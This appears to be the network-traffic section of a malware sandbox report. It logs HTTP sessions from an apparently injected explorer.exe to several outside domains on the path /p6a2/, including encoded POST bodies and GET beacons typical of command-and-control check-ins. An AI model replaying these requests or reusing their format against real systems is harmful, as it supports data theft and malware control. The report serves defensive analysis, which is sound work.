                                                                                              Dec 27, 2022 10:54:07.031306028 CET97INData Raw: 34 39 2e 39 39 34 2c 34 34 39 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 32 39 32 2e 34 31 36 2c 32 35 34 2e 33 31 32 61 31 2e 30 31 33 2c 31 2e 30 31 33 2c 30 2c 30 2c 31 2d 2e 34 31 37 2d 2e 30 39 4c
                                                                                              Data Ascii: 49.994,449Z" fill="#226d7a"/><path d="M292.416,254.312a1.013,1.013,0,0,1-.417-.09L266.634,242.6a1,1,0,0,1-.191-1.7L287.2,225a1,1,0,0,1,1.594.629l4.607,27.516a1,1,0,0,1-.986,1.165Zm-23.437-12.835,22.139,10.141L287.1,227.6Z" fill="#226d7a"/><pat
                                                                                              Dec 27, 2022 10:54:07.031339884 CET99INData Raw: 37 61 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 32 38 2e 36 31 37 2c 32 34 31 2e 38 61 31 2c 31 2c 30 2c 30 2c 30 2c 2e 37 2d 2e 32 38 32 6c 36 2e 34 36 31 2d 36 2e 32 36 36 61 31 2c 31 2c 30 2c 30 2c 30 2d 31 2e 33 39 33 2d 31 2e 34 33 36 6c 2d 36
                                                                                              Data Ascii: 7a"/><path d="M28.617,241.8a1,1,0,0,0,.7-.282l6.461-6.266a1,1,0,0,0-1.393-1.436l-6.461,6.266a1,1,0,0,0,.7,1.718Z" fill="#226d7a"/><path d="M19.257,291.006a1,1,0,0,0,.964-1.269L17.8,281.069a1,1,0,0,0-1.927.537l2.419,8.668A1,1,0,0,0,19.257,291.0
                                                                                              Dec 27, 2022 10:54:07.031358957 CET100INData Raw: 2d 31 2e 33 39 33 2d 31 2e 34 33 36 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 37 2c 31 38 34 63 2d 2e 31 38 32 2c 30 2d 2e 33 36 31 2e 30 31 34 2d 2e 35 34 2e 30 32 37 6c 2d 32 2e 33 2d 37 2e 37
                                                                                              Data Ascii: -1.393-1.436Z" fill="#226d7a"/><path d="M147,184c-.182,0-.361.014-.54.027l-2.3-7.786a1,1,0,1,0-1.918.567l2.263,7.66a6.977,6.977,0,0,0-2.643,11.269l-5.845,6.028a1,1,0,1,0,1.436,1.392L143.419,197A7,7,0,1,0,147,184Zm0,12a4.995,4.995,0,0,1-1.121-9
                                                                                              Dec 27, 2022 10:54:07.031379938 CET101INData Raw: 2c 33 2e 37 36 38 61 2e 39 38 31 2e 39 38 31 2c 30 2c 30 2c 30 2c 2e 34 33 32 2e 31 2c 31 2c 31 2c 30 2c 30 2c 30 2c 2e 34 33 35 2d 31 2e 39 5a 4d 38 39 31 2c 31 37 39 61 35 2c 35 2c 30 2c 31 2c 31 2c 35 2d 35 41 35 2e 30 30 36 2c 35 2e 30 30 36
                                                                                              Data Ascii: ,3.768a.981.981,0,0,0,.432.1,1,1,0,0,0,.435-1.9ZM891,179a5,5,0,1,1,5-5A5.006,5.006,0,0,1,891,179Z" fill="#226d7a"/><path d="M956.292,179.469a6.477,6.477,0,0,0,9.659-.268l6.739,4.9a1,1,0,1,0,1.176-1.617L967,177.492a6.5,6.5,0,1,0-11.811.4,1.064,
                                                                                              Dec 27, 2022 10:54:07.031399965 CET102INData Raw: 31 2c 30 2c 30 2c 30 2c 31 2e 36 2d 31 2e 32 5a 4d 39 32 31 2c 31 39 34 61 35 2c 35 2c 30 2c 31 2c 31 2c 35 2c 35 41 35 2e 30 30 36 2c 35 2e 30 30 36 2c 30 2c 30 2c 31 2c 39 32 31 2c 31 39 34 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f
                                                                                              Data Ascii: 1,0,0,0,1.6-1.2ZM921,194a5,5,0,1,1,5,5A5.006,5.006,0,0,1,921,194Z" fill="#226d7a"/><path d="M941,212a1,1,0,0,0-1.6,1.2l5.4,7.2a1,1,0,1,0,1.6-1.2Z" fill="#226d7a"/><path d="M876.837,80.654l-1.7,7.937a1,1,0,0,0,.767,1.187,1.029,1.029,0,0,0,.211.
                                                                                              Dec 27, 2022 10:54:07.031420946 CET104INData Raw: 61 74 68 20 64 3d 22 4d 39 38 34 2c 34 31 34 68 2d 38 76 2d 38 61 31 2c 31 2c 30 2c 30 2c 30 2d 32 2c 30 76 38 68 2d 38 61 31 2c 31 2c 30 2c 30 2c 30 2c 30 2c 32 68 38 76 38 61 31 2c 31 2c 30 2c 30 2c 30 2c 32 2c 30 76 2d 38 68 38 61 31 2c 31 2c
                                                                                              Data Ascii: ath d="M984,414h-8v-8a1,1,0,0,0-2,0v8h-8a1,1,0,0,0,0,2h8v8a1,1,0,0,0,2,0v-8h8a1,1,0,0,0,0-2Z" fill="#206d7a"/><path d="M800,9h-8V1a1,1,0,0,0-2,0V9h-8a1,1,0,0,0,0,2h8v8a1,1,0,0,0,2,0V11h8a1,1,0,0,0,0-2Z" fill="#206d7a"/></svg> <
                                                                                              Dec 27, 2022 10:54:07.031443119 CET105INData Raw: 6e 74 73 3d 22 31 35 36 2e 30 31 35 20 31 30 36 2e 30 30 38 20 31 35 34 2e 31 37 37 20 31 30 38 2e 31 32 32 20 31 35 36 2e 30 31 35 20 31 31 30 2e 32 33 35 20 31 35 37 2e 38 35 34 20 31 30 38 2e 31 32 32 20 31 35 36 2e 30 31 35 20 31 30 36 2e 30
                                                                                              Data Ascii: nts="156.015 106.008 154.177 108.122 156.015 110.235 157.854 108.122 156.015 106.008" fill="#fff"/><polygon points="156.015 94.202 154.177 96.316 156.015 98.429 157.854 96.316 156.015 94.202" fill="#fff"/><polygon points="156.015 82.396 154.17
                                                                                              Dec 27, 2022 10:54:07.302020073 CET107INData Raw: 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 37 36 2e 35 36 33 20 38 32 2e 33 39 36 20 31 37 34 2e 37 32 34 20 38 34 2e 35 31 20 31 37 36 2e 35 36 33 20 38 36 2e 36 32 34 20 31 37 38 2e 34 30 31 20 38 34 2e 35 31 20 31 37 36 2e 35 36 33 20 38 32 2e 33
                                                                                              Data Ascii: gon points="176.563 82.396 174.724 84.51 176.563 86.624 178.401 84.51 176.563 82.396" fill="#fff"/><polygon points="186.835 129.621 184.997 131.734 186.835 133.848 188.674 131.734 186.835 129.621" fill="#fff"/><polygon points="186.835 117.814


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              1192.168.2.449696194.58.112.17480C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:54:17.827792883 CET181OUTPOST /p6a2/ HTTP/1.1
                                                                                              Host: www.newhard.ru
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              Cache-Control: no-cache
                                                                                              Origin: http://www.newhard.ru
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://www.newhard.ru/p6a2/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Data Raw: 50 4a 73 4f 65 3d 65 35 6d 38 34 30 68 58 37 39 52 65 28 6d 43 31 69 43 4b 78 4e 76 4b 61 31 63 64 70 52 6b 49 71 68 36 53 4f 39 31 35 50 77 70 47 4f 36 73 7e 39 68 4e 5a 55 6c 4b 35 38 54 67 6d 79 7a 77 48 57 4c 4f 4e 76 63 76 45 6f 7a 46 59 79 6d 63 77 6f 43 46 50 34 52 56 32 73 31 57 4c 52 39 43 7e 6a 7e 4f 31 32 32 65 48 65 6a 4d 68 4d 68 42 64 42 4b 47 70 74 7a 53 58 4d 7a 64 63 6e 32 6d 53 4a 45 52 33 63 6d 63 53 61 6d 4a 55 33 28 63 41 45 4f 44 79 4f 48 53 44 5a 4e 38 4f 39 71 36 73 31 6d 71 73 57 73 4a 79 4b 31 6a 45 62 6c 77 36 6b 48 51 29 2e 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: PJsOe=e5m840hX79Re(mC1iCKxNvKa1cdpRkIqh6SO915PwpGO6s~9hNZUlK58TgmyzwHWLONvcvEozFYymcwoCFP4RV2s1WLR9C~j~O122eHejMhMhBdBKGptzSXMzdcn2mSJER3cmcSamJU3(cAEODyOHSDZN8O9q6s1mqsWsJyK1jEblw6kHQ).
                                                                                              Dec 27, 2022 10:54:17.890141010 CET181INHTTP/1.1 302 Moved Temporarily
                                                                                              Server: nginx
                                                                                              Date: Tue, 27 Dec 2022 09:54:17 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 154
                                                                                              Connection: close
                                                                                              Location: http://newhard.ru/p6a2/
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              10192.168.2.449705107.149.40.24780C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:54:54.148135900 CET194OUTGET /p6a2/?PJsOe=xeOhXlH059OOkCPPeiyznifX6DCn6GLjVIPb0HMEaj6kEld1NZvpN20tPmlU3A5oPB4rwbGiD40G1zaemtArGBjdZepieKoLuQ==&4u=XXw8ZRfd0 HTTP/1.1
                                                                                              Host: www.elite-travel-cn.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Dec 27, 2022 10:54:54.323177099 CET194INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Tue, 27 Dec 2022 09:54:54 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 1.0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              11192.168.2.449706176.28.33.2580C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:54:59.417362928 CET195OUTPOST /p6a2/ HTTP/1.1
                                                                                              Host: www.cobramierer.com
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              Cache-Control: no-cache
                                                                                              Origin: http://www.cobramierer.com
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://www.cobramierer.com/p6a2/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Data Raw: 50 4a 73 4f 65 3d 6e 72 4d 33 6c 61 56 79 6c 32 50 4d 47 33 59 4e 45 74 52 67 77 78 46 37 50 38 53 48 32 6a 6c 58 52 4d 56 5a 33 59 6b 75 58 48 45 52 70 37 45 32 77 79 47 70 44 6d 44 48 35 61 53 50 30 30 68 4d 32 77 28 30 28 31 4e 63 4c 42 65 30 7e 62 6a 65 6f 35 46 50 6c 65 64 4c 4f 6d 65 76 46 6a 7e 59 48 66 77 32 65 66 5a 6d 6e 4a 31 47 59 67 76 37 69 6f 6c 78 48 75 4a 47 32 74 64 33 50 65 43 46 6c 33 5a 31 70 57 61 32 32 53 4f 31 38 78 51 58 7a 7a 4f 4e 72 63 6f 4c 62 61 56 7a 32 55 37 39 65 57 63 48 47 33 65 62 6a 69 37 4a 43 70 42 37 7a 51 29 2e 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: PJsOe=nrM3laVyl2PMG3YNEtRgwxF7P8SH2jlXRMVZ3YkuXHERp7E2wyGpDmDH5aSP00hM2w(0(1NcLBe0~bjeo5FPledLOmevFj~YHfw2efZmnJ1GYgv7iolxHuJG2td3PeCFl3Z1pWa22SO18xQXzzONrcoLbaVz2U79eWcHG3ebji7JCpB7zQ).
                                                                                              Dec 27, 2022 10:54:59.441658020 CET197INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 27 Dec 2022 09:54:59 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Server: Apache
                                                                                              Vary: accept-language,accept-charset
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Language: en
                                                                                              Expires: Tue, 27 Dec 2022 09:54:59 GMT
                                                                                              Data Raw: 34 38 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 77 65 62 6d 61 73 74 65 72 40 64 69 67 69 74 61 6c 69 73 69 65 72 75 6e 67 2d 6d 69 74 2d 73 79 73 74 65 6d 2e 64 65 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0a 0a 20 20 20 20 54 68 65 20 6c 69 6e 6b 20 6f 6e 20 74 68 65 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 62 72 61 6d 69 65 72 65 72 2e 63 6f 6d 2f 70 36 61 32 2f 22 3e 72 65 66 65 72 72 69 6e 67 0a 20 20 20 20 70 61 67 65 3c 2f 61 3e 20 73 65 65 6d 73 20 74 6f 20 62 65 20 77 72 6f 6e 67 20 6f 72 20 6f 75 74 64 61 74 65 64 2e 20 50 6c 65 61 73 65 20 69 6e 66 6f 72 6d 20 74 68 65 20 61 75 74 68 6f 72 20 6f 66 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 62 72 61 6d 69 65 72 65 72 2e 63 6f 6d 2f 70 36 61 32 2f 22 3e 74 68 61 74 20 70 61 67 65 3c 2f 61 3e 0a 20 20 20 20 61 62 6f 75 74 20 74 68 65 20 65 72 72 6f 72 2e 0a 0a 20 20 0a 0a 3c 2f 70 3e 0a 3c 70 3e 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 77 65 62 6d 61 73 74 65 72 40 64 69 67
                                                                                              Data Ascii: 48e<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:webmaster@digitalisierung-mit-system.de" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*...*/--></style></head><body><h1>Object not found!</h1><p> The requested URL was not found on this server. The link on the <a href="http://www.cobramierer.com/p6a2/">referring page</a> seems to be wrong or outdated. Please inform the author of <a href="http://www.cobramierer.com/p6a2/">that page</a> about the error. </p><p>If you think this is a server error, please contactthe <a href="mailto:webmaster@dig
                                                                                              Dec 27, 2022 10:54:59.441714048 CET197INData Raw: 69 74 61 6c 69 73 69 65 72 75 6e 67 2d 6d 69 74 2d 73 79 73 74 65 6d 2e 64 65 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0a 3c 2f 70 3e 0a 0a 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 32 3e 0a 3c 61 64 64 72 65 73 73 3e 0a 20 20 3c
                                                                                              Data Ascii: italisierung-mit-system.de">webmaster</a>.</p><h2>Error 404</h2><address> <a href="/">www.cobramierer.com</a><br /> <span>Apache</span></address></body></html>
                                                                                              Dec 27, 2022 10:54:59.441752911 CET197INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              12192.168.2.449707176.28.33.2580C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:55:01.965841055 CET197OUTGET /p6a2/?4u=XXw8ZRfd0&PJsOe=qpkXmqYajFP/MwMsH85/xAR+HuOV3BhXfepUxIkOb3Nti8d1pwDCNiT47pq1pm9vxSngzgxeICaYyJ2YpLhtuPpEAFm4f33eOg== HTTP/1.1
                                                                                              Host: www.cobramierer.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Dec 27, 2022 10:55:01.991780996 CET199INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 27 Dec 2022 09:55:01 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Server: Apache
                                                                                              Vary: accept-language,accept-charset
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Language: en
                                                                                              Expires: Tue, 27 Dec 2022 09:55:01 GMT
                                                                                              Data Raw: 33 66 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 77 65 62 6d 61 73 74 65 72 40 64 69 67 69 74 61 6c 69 73 69 65 72 75 6e 67 2d 6d 69 74 2d 73 79 73 74 65 6d 2e 64 65 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0a 0a 3c 2f 70 3e 0a 3c 70 3e 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 77 65 62 6d 61 73 74 65 72 40 64 69 67 69 74 61 6c 69 73 69 65 72 75 6e 67 2d 6d 69 74 2d 73 79 73 74 65 6d 2e 64 65 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0a 3c 2f 70 3e 0a 0a 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 32 3e 0a 3c 61 64 64 72 65 73 73 3e 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 77 77 77 2e 63 6f 62 72 61 6d 69 65 72 65 72 2e 63 6f 6d 3c 2f 61 3e 3c 62 72 20 2f 3e 0a 20 20 3c 73 70 61 6e 3e 41 70 61 63 68 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 64
                                                                                              Data Ascii: 3f9<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:webmaster@digitalisierung-mit-system.de" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*...*/--></style></head><body><h1>Object not found!</h1><p> The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p><p>If you think this is a server error, please contactthe <a href="mailto:webmaster@digitalisierung-mit-system.de">webmaster</a>.</p><h2>Error 404</h2><address> <a href="/">www.cobramierer.com</a><br /> <span>Apache</span></ad
                                                                                              Dec 27, 2022 10:55:01.991805077 CET199INData Raw: 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: dress></body></html>0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              13192.168.2.449708146.148.102.20180C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:55:07.397564888 CET200OUTPOST /p6a2/ HTTP/1.1
                                                                                              Host: www.byfuture.biz
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              Cache-Control: no-cache
                                                                                              Origin: http://www.byfuture.biz
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://www.byfuture.biz/p6a2/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Data Raw: 50 4a 73 4f 65 3d 67 54 59 79 75 7a 78 5a 6e 36 74 42 4b 42 79 43 31 67 6b 42 51 67 77 64 63 4f 79 4c 6f 30 52 74 4a 35 37 4c 36 31 72 4e 50 34 53 68 42 68 58 69 62 31 73 34 37 56 77 64 35 72 45 55 32 6a 63 46 56 49 62 71 78 4e 52 50 4c 73 36 56 6d 68 75 4e 47 63 77 30 37 70 58 52 47 73 50 59 58 48 45 7a 28 4f 6d 4e 4f 2d 63 68 48 42 46 43 6e 61 62 75 72 6b 79 6d 44 62 28 2d 57 43 4b 61 48 58 50 33 70 43 54 72 44 56 79 6f 6d 56 6b 6c 7a 6c 4b 4e 61 7a 4e 37 53 45 6b 32 39 58 5a 63 74 43 4c 53 49 50 42 4d 56 34 62 64 63 47 7e 76 4c 46 59 55 57 51 29 2e 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: PJsOe=gTYyuzxZn6tBKByC1gkBQgwdcOyLo0RtJ57L61rNP4ShBhXib1s47Vwd5rEU2jcFVIbqxNRPLs6VmhuNGcw07pXRGsPYXHEz(OmNO-chHBFCnaburkymDb(-WCKaHXP3pCTrDVyomVklzlKNazN7SEk29XZctCLSIPBMV4bdcG~vLFYUWQ).
                                                                                              Dec 27, 2022 10:55:07.566565990 CET201INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 27 Dec 2022 09:55:07 GMT
                                                                                              Content-Length: 0
                                                                                              Connection: close
                                                                                              Allow: GET
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              Access-Control-Allow-Origin: http://www.byfuture.biz
                                                                                              Access-Control-Expose-Headers: X-XSRF-TOKEN
                                                                                              Request-Context: appId=cid-v1:ce9d7f2e-1df5-4b59-a003-2b983b7619ed
                                                                                              X-Builder-Tracking-Id: 1d0cbc760d724ff3a9a30b609d89cfb1
                                                                                              Server: Viewer


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              14192.168.2.449709146.148.102.20180C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
